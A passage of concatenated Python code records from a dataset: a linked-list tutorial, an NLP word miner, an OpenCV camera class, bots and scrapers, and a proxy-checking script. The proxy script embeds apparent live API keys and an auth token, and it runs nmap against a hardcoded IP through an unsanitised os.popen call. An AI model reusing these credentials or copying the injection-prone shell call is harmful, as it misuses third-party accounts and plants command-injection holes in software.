8268:{'sid':8268,'given':'Jeff','family':'Garceau','age':22},\n 5735:{'sid':5735,'given':'Ji','family':'Garris','age':20},\n 1866:{'sid':1866,'given':'Williams','family':'Gillie','age':24},\n 1625:{'sid':1625,'given':'Abigail','family':'Grignon','age':19},\n 3542:{'sid':3542,'given':'Raleigh','family':'Guitierrez','age':28},\n 6717:{'sid':6717,'given':'Gene','family':'Hamblin','age':56},\n 8139:{'sid':8139,'given':'Cesar','family':'Hougen','age':30},\n 8084:{'sid':8084,'given':'Michel','family':'Jablonski','age':24},\n 6401:{'sid':6401,'given':'Tandra','family':'Joines','age':19},\n 1760:{'sid':1760,'given':'Karena','family':'Killeen','age':19},\n 9024:{'sid':9024,'given':'German','family':'Klass','age':22},\n 5131:{'sid':5131,'given':'Millard','family':'Kluth','age':20},\n 8254:{'sid':8254,'given':'Nga','family':'Kriebel','age':25},\n 7144:{'sid':7144,'given':'Siobhan','family':'Kuo','age':32},\n 5034:{'sid':5034,'given':'Otha','family':'Lang','age':23},\n 4580:{'sid':4580,'given':'Kelsey','family':'Lares','age':21},\n 6528:{'sid':6528,'given':'Buck','family':'Lenig','age':24},\n 9072:{'sid':9072,'given':'Corey','family':'Liberatore','age':33},\n 2302:{'sid':2302,'given':'Kecia','family':'Lindemann','age':31},\n 1165:{'sid':1165,'given':'Santa','family':'Masden','age':31},\n 6849:{'sid':6849,'given':'Glennis','family':'Mcandrews','age':20},\n 6090:{'sid':6090,'given':'Pandora','family':'Mceachern','age':27},\n 3566:{'sid':3566,'given':'Brigida','family':'Meng','age':31},\n 2680:{'sid':2680,'given':'Chung','family':'Milstead','age':24},\n 4221:{'sid':4221,'given':'Noelia','family':'Mullet','age':46},\n 9603:{'sid':9603,'given':'Garret','family':'Nakasone','age':21},\n 3769:{'sid':3769,'given':'Garth','family':'Nanez','age':20},\n 8320:{'sid':8320,'given':'Lavada','family':'Neace','age':35},\n 9104:{'sid':9104,'given':'August','family':'Neilsen','age':28},\n 8741:{'sid':8741,'given':'Ward','family':'Ney','age':25},\n 7735:{'sid':7735,'given':'Emil','family':'Oland','age':18},\n 1043:{'sid':1043,'given':'Julio','family':'Overland','age':21},\n 6028:{'sid':6028,'given':'Zaida','family':'Pablo','age':21},\n 5290:{'sid':5290,'given':'Ardella','family':'Pendarvis','age':21},\n 4223:{'sid':4223,'given':'Yun','family':'Perl','age':31},\n 2409:{'sid':2409,'given':'Emile','family':'Reis','age':25},\n 8602:{'sid':8602,'given':'Lucia','family':'Richter','age':19},\n 9077:{'sid':9077,'given':'Mohammed','family':'Sakamoto','age':36},\n 6887:{'sid':6887,'given':'Delora','family':'Sayegh','age':19},\n 9143:{'sid':9143,'given':'Gayle','family':'Schiro','age':35},\n 6650:{'sid':6650,'given':'Fermin','family':'Schutz','age':19},\n 7907:{'sid':7907,'given':'Del','family':'Shellman','age':36},\n 5814:{'sid':5814,'given':'Stacy','family':'Sorrentino','age':20},\n 4013:{'sid':4013,'given':'Gladys','family':'Stringham','age':19},\n 2701:{'sid':2701,'given':'Gilberto','family':'Tidsworth','age':20},\n 1096:{'sid':1096,'given':'Josefa','family':'Tinker','age':24},\n 5160:{'sid':5160,'given':'Ervin','family':'Voight','age':34},\n 2009:{'sid':2009,'given':'Porfirio','family':'Weible','age':39},\n}\n\n# Unit enrolments\n\ntik301 = {1043,1165,1625,1866,2009,2167,2701,3566,5034,5131,6331,6650,6717,6849,8084,9024,9072,9143,9494,9853}\nikt130 = {1165,1625,1760,1866,2302,2680,4223,5031,5034,5131,5814,6650,6887,7907,8084,8320,8860,9024,9143,9494}\nkti310 = {1043,1165,1625,2009,3542,3566,4013,4221,4580,8320}\nt = tik301\ni = ikt130\nk = kti310\n\n\n","sub_path":"student_db.py","file_name":"student_db.py","file_ext":"py","file_size_in_byte":6076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"307998573","text":"# [한방향 연결 리스트 구현하기]\nclass Node: # 노드 정의\n def __init__(self, key=None, value=None):\n self.key = key\n self.value = value\n self.next = None\n \n def __str__(self):\n return str(self.key)\n \nclass SinglyLinkedList: # 한방향 연결 리스트 정의\n def __init__(self):\n self.head = None\n self.size = 0\n \n def __iter__(self):\n v = self.head\n while v != None:\n yield v\n v = v.next\n \n def __str__(self):\n return \" -> \".join(str(v) for v in self)\n \n def __len__(self):\n return self.size\n \n def printList(self):\n v = self.head\n while v:\n print(v.key, \"->\", end=\" \")\n v = v.next\n print(\"None\")\n \n def pushFront(self, key, value):\n new_node = Node(key, value)\n new_node.next = self.head\n self.head = new_node\n self.size += 1\n \n def pushBack(self, key, value):\n new_node = Node(key, value)\n if self.size == 0: # empty list\n self.head = new_node # new_node가 head가 됨\n else:\n tail = self.head\n while tail.next != None: # tail 노드 찾기\n tail = tail.next\n tail.next = new_node\n self.size += 1\n \n def popFront(self):\n if self.size == 0:\n return None\n else:\n x = self.head\n key = x.key\n self.head = x.next\n self.size = self.size - 1\n del x\n return key\n \n def popBack(self):\n if self.size == 0: # empty list\n return None\n else:\n prev, tail = None, self.head\n while tail.next != None:\n prev = tail\n tail = tail.next\n if prev == None: # len(list) == 1\n self.head = None\n else: # len(list) > 1\n prev.next = tail.next\n key = tail.key\n del tail\n self.size -= 1\n return key\n \n def search(self, key):\n v = self.head\n while v:\n if v.key == key:\n return v\n v = v.next\n return None\n \n def remove(self, x):\n if self.size == 0 or x == None:\n return False\n elif x == self.head:\n v = self.head\n self.head = self.head.next\n self.size -= 1\n del v\n return True\n else:\n prev, target = None, self.head\n while target and target != x:\n prev = target\n target = target.next\n prev.next = target.next\n self.size -= 1\n del target\n return True\n \n def size(self):\n return self.size\n\n# [연산의 시간복잡도]\n# 대상이 되는 노드가 head 노드로부터 k번째 떨어진 노드라고 가정\n# pushFront: 1, pushBack: k\n# popFront: 1, popBack: k\n# search: k, remove: k\n\n# [한방향 연결 리스트와 배열의 장단점은 무엇인가?]\n# 장점: 한 방향 연결 리스트는 데이터를 삽입, 제거하는 경우,\n# 배열과는 다르게 뒷 인덱스인 데이터들의 인덱스를 수정하지 않아도 된다.\n# 단점: pushFront와 popFront를 제외한 나머지 작업에서,\n# 어떤 데이터의 인덱스를 찾거나 참조, 작업을 수행하기 위해서는 해당 데이터의 위치만큼의 시간복잡도가 소요된다.\n\n# [한방향 이중 연결 리스트의 연결을 반대 방향으로 바꾸는 함수 reverse() 구현하기]\n# 1. 연결 리스트를 반대 방향으로 연결한 후, 새로운 head 노드를 리턴\n def reverse1(self):\n a, b = None, self.head\n while b:\n c = b.next\n b.next = a\n a = b\n b = c\n self.head = a\n \n def reverse2(self, a, b): # 재귀 함수로 구현해보자\n if b == None:\n self.head = a\n return\n \n c = b.next\n b.next = a\n self.reverse2(self, b, c)\n\n# Running technique:\n# 한방향 연결 리스트에서 tail 노드와 prev 노드를 찾는 방법에 쓰인 기법으로\n# 두 개의 (포인터) 변수를 사용해 원하는 위치의 노드를 계산하는 방법\n# 1. prev = None, tail = L.head 로 prev가 tail의 한 노드 뒤에서 따라가면서\n# tail이 실제 tail 노드에 도착하면, prev는 tail 노드 전 노드를 가르킴!\n# 2. [인터뷰 문제1] find_kth_node_from_tail(L, k):\n# - tail 노드로부터 k번째 전에 있는 노드를 찾아라. (단, 리스트 L의 노드 개수는 모른다고 가정한다.)\n def find_kth_node_from_tail(self, k):\n self.reverse1()\n x = self.head\n count = 0\n while x and x.key != k:\n count += 1\n x = x.next\n self.reverse1()\n if x == None:\n return None\n return count\n\n# 3. [인터뷰 문제2] find_middle_node(L):\n# - 리스트 L의 노드 개수를 모른다고 가정하고, L의 중간에 위치한 노드를 찾아라!\n# (L의 노드 개수가 짝수면 중간의 두 노드 중 아무 노드라도 정답)\n def find_middle_node(self):\n length = 0\n v = self.head\n if v == None:\n return None\n \n while v != None:\n length += 1\n v = v.next\n\n count = 1\n v = self.head\n while True:\n if count == (length//2)+1:\n return v.key\n count += 1\n v = v.next\n \nL = SinglyLinkedList()\nL.pushBack(1, 1)\nL.pushBack(2, 2)\nL.pushBack(3, 3)\nL.pushBack(4, 4)\nprint(L)\nL.reverse1()\nprint(L)\nL.reverse2(None, L.head)\nprint(L)\nprint(L.find_kth_node_from_tail(2))\nprint(L)\nprint(L.find_middle_node())","sub_path":"자료구조/02_Singly_Linked_List.py","file_name":"02_Singly_Linked_List.py","file_ext":"py","file_size_in_byte":5838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"127674400","text":"import csv\nimport pandas as pd\nimport io\nimport requests\nimport nmap\nimport pydnsbl\nimport urllib\nimport socket\nimport json\nimport requests\nsocket.setdefaulttimeout(180)\nimport os\n\ndef api_hideme():\n hideme = \"http://incloak.com/api/proxylist.php?out=csv&code=\" + \"730480402242392\"\n urlData = requests.get(hideme).content\n df = pd.read_csv(io.StringIO(urlData.decode('utf-8')),delimiter=\";\")\n return df\n\ndef api_premproxy():\n z = \"http://filefab.com/api.php?l=90Ft8r4B9ejHAmXjfUKDcoNTZIZrCPGyqv-0E2JAx_Q\"\n urlData = requests.get(z).content\n df = pd.read_csv(io.StringIO(urlData.decode('utf-8')), delimiter=\":\")\n return df\n\ndef dailyproxy():\n url = \"https://proxy-daily.com/api/getproxylist?apikey=MHAvkX-UOWjz6vbT-t9cpK1&format=ipport&country=US&type=socks5&lastchecked=60\"\n urlData = requests.get(url).content\n df = pd.read_csv(io.StringIO(urlData.decode('utf-8')), delimiter=\":\")\n return df\n\ndef openproxy():\n url = \"https://api.openproxy.space/premium/plain?amount=34999&apiKey=i9414-d994p4Pa29118LW-yfIl5-eBY64dMT5N16uDv-Vw10n&checksMore=354&countries=US&protocols=3&status=1&streak=1\"\n urlData = requests.get(url).content\n df = pd.read_csv(io.StringIO(urlData.decode('utf-8')), delimiter=\":\")\n return df\n\ndef auth0(ip):\n try:\n url = \"https://signals.api.auth0.com/badip/\" + ip\n headers = {\n 'accept': \"application/json\",\n 'x-auth-token': \"51fac7a1-04c8-4c2f-8143-76c5fa498ff9\"\n }\n response = r.request(\"GET\", url, headers=headers)\n x = json.loads(response.text)\n return x['type']\n except:\n print('err')\n finally:\n return \"NA\"\n\n\ndef isblk(ip):\n ip_checker = pydnsbl.DNSBLIpChecker()\n x = str(ip_checker.check(ip))\n print(x)\n if 'BLACKLISTED' in x:\n a = x.rfind('(')\n b = x.rfind(')')\n ab = x[a+1:b]\n ap = auth0(ip)\n return 'black - ' + ab + ' - ' + str(ap)\n else:\n return 'fine'\n\ndef islive(ip,port):\n qry = 'nmap -p ' + str(port) + ' ' + str(ip)\n y = os.popen(qry).read()\n print(y)\n if 'open' in y:\n ab = isblk(ip)\n x = 'live' + '-' + str(ab)\n else:\n x = 'dead'\n return x\n\ndef ipdb_2(ip):\n url = \"https://freegeoip.app/json/\" + ip\n headers = {\n 'accept': \"application/json\",\n 'content-type': \"application/json\"\n }\n response = requests.request(\"GET\", url, headers=headers)\n x = json.loads(response.text)\n y = x['city'] + ' -' + x['country_code']\n return y\n\n\nislive('173.0.54.188','6888')\n","sub_path":"Z_ALL_FILE/Py/omapi._10112020-1432.py","file_name":"omapi._10112020-1432.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"190124705","text":"#!/usr/bin/python3.7\n# -*- coding: utf-8 -*-\n# @Time : 2018/2/28 10:58\n# @Email : jtyoui@qq.com\n# @Software: PyCharm\n\n\nimport math\nimport re\nfrom jtyoui.regular import Non_Chinese\nfrom jtyoui.decorator import replace_regular\nimport os\n\nALL_WORDS = dict()\nAll_LENS = 0\n\n\ndef read_string(st, split_num, split_seq='[,。!?:.,?]'):\n \"\"\"\n 讲字符按照split_seq格式来分割\n :param st: 字符串\n :param split_num:分词的个数\n :param split_seq: 字符分割\n :return: None\n \"\"\"\n ls = re.split(split_seq, st)\n read_ls(ls, split_num)\n\n\ndef read_ls(ls, split_num):\n \"\"\"数据类型[str]\n :param ls: 表示链表\n :param split_num:分词的个数\n \"\"\"\n global All_LENS\n for word in ls:\n All_LENS += len(word)\n clean_data, lens = clean(data=word)\n if lens > 2:\n split(clean_data, lens, split_num)\n\n\ndef split(words, lens, split_num):\n \"\"\"\n 拆分字符,最大匹配num个字符,并也字典的形式返回,\n [出现次数,出现频率,凝固程度,自由程度,关键字的左邻,关键字的右邻](作为信息熵的衡量)\n \"\"\"\n for i in range(0, lens):\n for j in range(1, split_num + 1):\n if i + j < lens:\n key = words[i:i + j]\n word = ALL_WORDS.get(key)\n if word:\n word[0] += 1\n word[4].append(words[i - 1])\n word[5].append(words[i + j])\n else:\n ALL_WORDS[key] = [1, 0.0, 1, 0, [words[i - 1]], [words[i + j]]]\n\n\ndef statistics(): # 统计每个单词的频率\n for key in ALL_WORDS:\n ALL_WORDS[key][1] = ALL_WORDS[key][0] / All_LENS\n\n\ndef handle():\n \"\"\"\n 处理数据\n 计算左邻字集合和右邻字集合的频率,左邻字信息熵和右邻字信息熵中的较小值\n 计算凝固程度,自由程度\n \"\"\"\n for key in ALL_WORDS:\n word_list = ALL_WORDS[key] # 获得一个单词的链表信息\n if len(key) == 1:\n continue\n end_all = front_all = 0.0\n left = word_list[1] / (ALL_WORDS[key[0]][1] * ALL_WORDS[key[1:]][1]) # 左邻字集合的频率\n right = word_list[1] / (ALL_WORDS[key[-1]][1] * ALL_WORDS[key[:-1]][1]) # 右邻字集合的频率\n\n for front in word_list[4]:\n if ALL_WORDS.get(front):\n front_all -= math.log(ALL_WORDS[front][1]) * ALL_WORDS[front][1] # 左邻字的信息熵\n\n for end in word_list[5]:\n if ALL_WORDS.get(end):\n end_all -= math.log(ALL_WORDS[end][1]) * ALL_WORDS[end][1] # 右邻字的信息熵\n\n # 左邻字集合和右邻字集合的频率相比较.谁越少说明该词语越容易接近谁\n word_list[2] = left if left < right else right\n\n # 左邻字集合的信息熵和右邻字集合的信息熵的相比较.谁的信息熵越少说明该集合提供的信息越大\n word_list[3] = front_all if front_all < end_all else end_all\n\n\ndef filter_words(frequency, cond, free, flag):\n \"\"\"\n 过滤一些不重要的数据\n [出现次数,出现频率,凝固程度,自由程度]\n :param frequency: 过滤的频率\n :param cond:过滤凝聚度\n :param free:过滤自由度\n :param flag: 是否是并且还是或者,默认是或者,满足一个就过滤\n :return:过滤后的数据字典\n \"\"\"\n key_words = dict()\n for key in ALL_WORDS.keys():\n if len(key) <= 1:\n continue\n one_word = ALL_WORDS[key]\n if flag:\n if one_word[1] > frequency and one_word[2] > cond and one_word[3] > free:\n key_words[key] = [one_word[0], one_word[1], one_word[2], one_word[3]]\n else:\n if one_word[1] > frequency or one_word[2] > cond or one_word[3] > free:\n key_words[key] = [one_word[0], one_word[1], one_word[2], one_word[3]]\n return key_words\n\n\n@replace_regular(Non_Chinese, '')\ndef clean(data):\n # 去除非中文字符\n return data, len(data)\n\n\ndef analysis_single(file_str, split_num=4, frequency=0.0001, cond=10, free=0.1, flag=False):\n \"\"\"\n :param file_str: 训练的文本,或者字符串,或者是句子列表\n :param split_num: 匹配个数\n :param frequency: 频率\n :param cond: 凝聚度\n :param free: 自由度\n :param flag:是否是并且还是或者,默认是或者,满足一个就过滤\n :return: 分析完毕的字典\n \"\"\"\n if os.path.exists(file_str):\n with open(file_str, encoding='utf-8') as fp:\n for line in fp:\n read_string(line, split_num)\n elif isinstance(file_str, list):\n read_ls(file_str, split_num)\n else:\n read_string(file_str, split_num)\n\n print(\"开始统计频率.........\")\n statistics()\n\n print(\"开始处理数据.........\")\n handle()\n\n print(\"开始过滤数据.........\")\n return filter_words(frequency, cond, free, flag)\n\n\nif __name__ == '__main__':\n neologism_words = analysis_single(r'D:\\data.txt', 6, 0.00001, 100, 0.1, flag=True)\n for k, v in neologism_words.items():\n print('key:{0} count:{1} frequency:{2} cond:{3} free:{4}'.format(k, v[0], v[1], v[2], v[3]))\n","sub_path":"jtyoui/word/Neologism.py","file_name":"Neologism.py","file_ext":"py","file_size_in_byte":5211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"110394589","text":"class CallbackList(list):\n def call_list(self, *args, **kwargs):\n for callback in self:\n assert callable(callback)\n callback(*args, **kwargs)\n\n def __iadd__(self, other):\n from collections import Iterable\n\n if not isinstance(other, Iterable) or isinstance(other, str):\n other = [other]\n\n return super().__iadd__(other)\n","sub_path":"UIBrowser/callbacklist.py","file_name":"callbacklist.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"412822917","text":"import cv2\nimport time\nimport multiprocessing as mp\n\n#Camera class to load the rtsp stream into another process with multiprocessing\n#in order to increase performance\nclass camera():\n\n def __init__(self,rtsp_url): \n #load pipe for data transmittion to the process\n self.parent_conn, child_conn = mp.Pipe()\n #load process\n self.p = mp.Process(target=self.update, args=(child_conn,rtsp_url)) \n #start process\n self.p.daemon = True\n self.p.start()\n\n def end(self):\n #send closure request to process\n self.parent_conn.send(2)\n\n def update(self,conn,rtsp_url):\n #load cam into seperate process\n print(\"Camera Loading\")\n cap = cv2.VideoCapture(rtsp_url,cv2.CAP_FFMPEG) \n print(\"Camera Loaded\")\n run = True\n\n while run:\n\n #grab frames from the buffer\n cap.grab()\n\n #recieve input data\n rec_dat = conn.recv()\n\n\n if rec_dat == 1:\n #if frame requested\n _, frame = cap.retrieve()\n conn.send(frame)\n\n elif rec_dat == 2:\n #if close requested\n cap.release()\n run = False\n\n print(\"Camera Connection Closed\") \n conn.close()\n cv2.destroyAllWindows()\n return\n\n def get_frame(self,resize=None):\n ###used to grab frames from the cam connection process\n\n #send request\n self.parent_conn.send(1)\n frame = self.parent_conn.recv()\n\n #reset request \n self.parent_conn.send(0)\n\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n\n #resize if needed\n if resize == None: \n return frame\n else:\n return self.rescale_frame(frame)\n\n def rescale_frame(self,frame):\n return cv2.resize(frame,(800, 480), interpolation = cv2.INTER_AREA) \n\n# Based on the code provided by Lewis Morris at \n# https://stackoverflow.com/questions/60816436/open-cv-rtsp-camera-buffer-lag","sub_path":"RaspberryPi/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"457623123","text":"# -*- coding: utf-8 -*-\nimport flask\nimport telebot\nimport conf\nimport random\n\nWEBHOOK_URL_BASE = \"https://{}:{}\".format(conf.WEBHOOK_HOST, conf.WEBHOOK_PORT)\nWEBHOOK_URL_PATH = \"/{}/\".format(conf.TOKEN)\n\nbot = telebot.TeleBot(conf.TOKEN, threaded=False)\n\nbot.remove_webhook()\n\nbot.set_webhook(url=WEBHOOK_URL_BASE+WEBHOOK_URL_PATH)\n\napp = flask.Flask(__name__)\n\n@bot.message_handler(commands=['start', 'help'])\ndef send_welcome(message):\n bot.send_message(message.chat.id, \"Раскольников. Родион Романович.\")\n\ndef phrase():\n with open('rask2.txt', 'r', encoding = 'utf-8') as f:\n text = f.readlines()\n return text\n\ntext = phrase()\n\ndef find_name(message):\n answer = message.split(' ')\n all_answers = []\n for all in text:\n for x in answer:\n if x in all:\n all_answers.append(all)\n return random.choice(all_answers)\n\ndef get_answer(message):\n try:\n answer = find_name(message)\n except:\n answer = random.choice(text)\n return answer\n\ndef write_questions(message):\n filename = 'questions.txt'\n with open(filename, 'a', encoding = 'utf-8') as f:\n f.writelines(message.text + '\\n')\n f.writelines(message.from_user.username)\n f.writelines('\\n')\n\n@bot.message_handler(func=lambda m: True) \ndef send_len(message):\n write_questions(message)\n answer = get_answer(message.text)\n bot.send_message(message.chat.id, answer)\n\n\n@app.route('/', methods=['GET', 'HEAD'])\ndef index():\n return 'ok'\n\n@app.route(WEBHOOK_URL_PATH, methods=['POST'])\ndef webhook():\n if flask.request.headers.get('content-type') == 'application/json':\n json_string = flask.request.get_data().decode('utf-8')\n update = telebot.types.Update.de_json(json_string)\n bot.process_new_updates([update])\n return ''\n else:\n flask.abort(403)","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"297107329","text":"import copy\nimport csv\nimport json\n\nimport numpy as np\nfrom sklearn import datasets\nfrom sklearn.ensemble import (BaggingClassifier, RandomForestClassifier,\n RandomForestRegressor)\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.utils import shuffle\n\n# 读取数据\nwith open('4_新编码数据生成训练集\\\\2_2020年新数据.json', 'r', encoding='utf-8') as f:\n _data = json.loads(f.read())\n\n# rank\nwith open('3_分割数据\\\\新编号.json', 'r', encoding='utf-8') as f:\n rank = json.loads(f.read())\n\n# 所有row的集合\nx = []\ny = []\n\n# 前面存储了出现在540中的关键词的序号\n# 最后一个位置存储公文点击量\na_row_of_info_x = []\na_row_of_info_y = []\n\nlimit = 0\n\nfor row in _data:\n\n # limit += 1\n\n # if limit > 10:\n # break\n\n # data\n #######################################################\n\n # 540个0\n for i in range(540):\n a_row_of_info_x.append(0)\n \n # 有关键词出现的地方补上1\n for keyword in row[0:-1]:\n a_row_of_info_x[keyword - 1] = 1\n\n #######################################################\n\n # target\n #######################################################\n\n # 最后加上点击量,6个等级:\n # x < 200:1\n # 200 <= x < 400:2\n # 400 <= x < 600:3\n # 600 <= x < 800:4\n # 800 <= x < 1000:5\n # x >= 1000:6\n\n click_times :int = row[-1]\n\n # 分类区间间隔\n # INTERVAL = 300\n\n # 几分类?\n # MAX_CLASSIFICATION = 3\n # a_row_of_info_y.append(min(click_times // INTERVAL, MAX_CLASSIFICATION - 1))\n a_row_of_info_y.append(click_times)\n\n #######################################################\n\n x.append(copy.deepcopy(a_row_of_info_x))\n a_row_of_info_x.clear()\n\n y.append(copy.deepcopy(a_row_of_info_y))\n a_row_of_info_y.clear()\n \n# header = rank.keys()\n\n# 把东西直接喂给KNN学习\n\niris_X=np.array(x)\niris_y=np.array(y)\n\nX_train,X_test,y_train,y_test=train_test_split(iris_X,iris_y,test_size=0.20,random_state=None, shuffle=True)\n\n\nforest = RandomForestClassifier(\n n_estimators=100,\n random_state=None,\n max_samples=0.8 #每个样本取这么多数据进行学习\n).fit(X_train, y_train.ravel())\n\nprint(forest.predict(X_test))\nprint(y_test)\nprint(\"准确率:\", forest.score(X_test, y_test))\n","sub_path":"5_特征提取_集成学习/539_random_forest_regression.py","file_name":"539_random_forest_regression.py","file_ext":"py","file_size_in_byte":2420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"402063463","text":"from itertools import groupby\nfrom models.lo_models import LearningObjective\nclass LoDB:\n\n def init_data(self):\n\n self.learning_objectives = {\n 'ind01*' : LearningObjective (\n id='ind01*',\n title=\"Computer Department expectations\",\n group='Induction',\n developing=\"Can describe some of the 5B's and 5P's.\",\n satisfactory= \"Can describe all of the 5B's and 5P's.\",\n exceeding= \"Can identify behaviours that exemplify the 5B's and 5P's.\"\n \n ),\n\n 'ind02*' : LearningObjective (\n id='ind01*',\n title=\"Using the VLE\",\n group='Induction',\n developing=\"Can access the VLE to download files and access messages.\",\n satisfactory= \"Can submit homework to the VLE.\",\n exceeding= \"Can describe the Rain Day process.\"\n \n ),\n\n 'ind03*' : LearningObjective (\n id='ind03*',\n title=\"Being a good Netizen\",\n group='Induction',\n developing=\"Can expand and explain the ancronym THINK.\",\n satisfactory= \"Can expand and explain the ancronym FAST.\",\n exceeding= \"Can expand the ancronym THINK.\"\n \n ),\n\n 'oo01*' : LearningObjective (\n id='oo01*',\n title='Find relevant and accurate results from an online search engine',\n group='Operating Online',\n developing='Can produce a set of results from an online search engine.',\n satisfactory= 'Can use advanced criteria in searching for results.',\n exceeding= 'Can assess the quality and veracity of a result'\n \n ),\n\n 'oo02*' : LearningObjective (\n id='oo02*',\n title='Create, edit, save and upload documents in a cloud environment.',\n group='Operating Online',\n developing='Is able to create a document online.',\n satisfactory= 'Is able to upload and edit a file created offline.',\n exceeding= 'Is able to locate a file created online in the synchronised folder.'\n \n ),\n \n 'aict01': LearningObjective(\n id='aict01',\n title='Bring together different types of information to achieve a purpose',\n group=\"Apply ICT\",\n developing='Can combine text information from a variety of sources.',\n satisfactory= 'Can combine graphical information from a variety of sources.',\n exceeding= 'Can multi media information (videos and audio) from a variety of sources.'\n ),\n\n 'aict02': LearningObjective(\n id='aict02',\n title='Produce information that is fit for purpose and audience, using accepted layouts and styles',\n group='Apply ICT',\n developing='Can produce work that partially meets a style guide.',\n satisfactory= 'Can completely follow a style guide.',\n exceeding= 'Can review the work of others and give feedback as to where a style guide is not followed.'\n ),\n 'ss01' : LearningObjective(\n id='ss01',\n title='Using the VLE.',\n group='Software Skills',\n developing='Requires assistance to use.',\n satisfactory= 'Can confidently use.',\n exceeding= 'Can troubleshoot other pupils issues.'\n ),\n 'ss02' : LearningObjective(\n id='ss02',\n title='Using a Word Processor.',\n group='Software Skills',\n developing='Requires assistance to use.',\n satisfactory= 'Can confidently use.',\n exceeding= 'Can troubleshoot other pupils issues.'\n ),\n 'ss03' : LearningObjective(\n id='ss03',\n title='Using a Graphics Package.',\n group='Software Skills',\n developing='Requires assistance to use.',\n satisfactory= 'Can confidently use.',\n exceeding= 'Can troubleshoot other pupils issues.'\n ),\n 'hoc01' : LearningObjective(\n id='hoc01',\n title='I can remember and understand key historic figures from the world of computing.',\n group='History of Computing',\n developing='I can name all of the heroes of computing.',\n satisfactory= 'I can analyse the impact of a hero of computing.',\n exceeding= 'I can create the narrative of the hero of computing.'\n ),\n 'hoc02' : LearningObjective(\n id='hoc02',\n title='I can remember and understand key historic figures from the world of computing.',\n group='History of Computing',\n developing='I can name all of the heroes of computing.',\n satisfactory= 'I can analyse the impact of a hero of computing.',\n exceeding= 'I can create the narrative of the hero of computing.'\n )\n }\n\n def __init__(self):\n self.init_data()\n\n def findById(id):\n return self.learning_objectives.get(id)\n\n def findByIds(self, *args):\n result = []\n\n for lo in self.learning_objectives.values():\n \n if lo.id in args:\n result.append(lo)\n \n return result\n \n def groupByType(self, los):\n \"\"\" return the Learning Objectives as a grouped iterable \"\"\"\n \n # sort all lo's by group\n data = sorted(los, key=lambda x: x.group)\n\n #group the LO's by group\n groups = groupby(data, lambda x: x.group)\n\n log_data = []\n\n for group in groups:\n log_data_item = [group, list(group[1])]\n log_data.append(log_data_item)\n\n return log_data;\n \n\nloDB = LoDB()\n ","sub_path":"DAO/lo_db.py","file_name":"lo_db.py","file_ext":"py","file_size_in_byte":6306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"510162714","text":"from DeviceController import on_off,get_devices\nimport paho.mqtt.client as mqtt\nimport json,os, time\n\n## CONFIGURATION ##\nos.chdir(os.path.dirname(os.path.realpath(__file__)))\nconfig_file = open(\"config.json\", \"r\")\nconfig_str = config_file.read()\nconfig = json.loads(config_str)\nconfig_file.close()\n###\n\ndef callback_controller(client, userdata, message):\n print(\"%s %s\" % (message.topic, message.payload.decode(\"utf-8\")))\n on_off(message.topic,message.payload.decode(\"utf-8\"))\n\nmqttc = mqtt.Client()\n\n# Add message callbacks that will only trigger on a specific subscription match.\nMQTT_TOPICS=[]\nfor device in get_devices():\n if device != \"motor\":\n mqttc.message_callback_add(device, callback_controller)\n MQTT_TOPICS.append((device,0))\n\n# Connec to MQTT Server and Subscribe to device topics\ncheck = True\nwhile check:\n try:\n mqttc.connect(config[\"mqtt\"][\"server\"], config[\"mqtt\"][\"port\"], config[\"mqtt\"][\"keepalive\"])\n mqttc.subscribe(MQTT_TOPICS)\n mqttc.loop_forever()\n check=False\n except:\n print(\"Unable to connect to MQTT broker, retrying...\")\n time.sleep(1)\n\n","sub_path":"MQTT_watcher.py","file_name":"MQTT_watcher.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"19665693","text":"\"\"\"Create pdf from web book. Jordan Osborn 2018.\"\"\"\n\nimport requests, bs4, re, pdfkit\nfrom typing import List\nfrom collections import OrderedDict\nfrom multiprocessing import Pool\nfrom sys import argv\nimport os\nfrom shutil import rmtree\n\nTMPOUTPUT = \"haskellWeboutput\"\n\ndef download(url: str) -> str:\n \"\"\"Download url.\n\n Arguments:\n url {str} -- url to download\n\n Returns:\n [type] -- contents from url\n\n \"\"\"\n print(\"Downloading \" + url)\n text = requests.get(url).text\n print(\"Downloaded \" + url)\n return text\n\ndef save(content:tuple) -> None:\n \"\"\"Save file.\n\n Arguments:\n content {str} -- file content\n\n Returns:\n str -- [description]\n\n \"\"\"\n print(\"Saving file \" + content[0])\n with open(TMPOUTPUT + \"/\" + content[0]+\".html\", \"w\") as f:\n f.write(content[1])\n print(\"Saved file \" + content[0])\n\nif __name__ == \"__main__\":\n root = argv[1]\n contentPage = argv[2]\n output = argv[3]\n\n baseURIReg = re.compile(r\"(http|https):\\/\\/(.+)\")\n baseURI = baseURIReg.findall(root)[0][1]\n\n reg = re.compile(r\".+?#.*\")\n urls = map(lambda t: t.get(\"href\"), bs4.BeautifulSoup(download(root + \"/\" + contentPage), \"html.parser\").find_all(\"a\"))\n chapters = [contentPage] + list(filter(lambda t: not (t.find(\"http\") == 0 and t.find(baseURI) == -1 or reg.match(t)), urls))\n links: List[str] = list(map(lambda l: (root + \"/\" + l) if l.find(baseURI) == -1 else (l), chapters))\n order = [str(x) for x in range(0,len(links))]\n try:\n rmtree(TMPOUTPUT)\n except 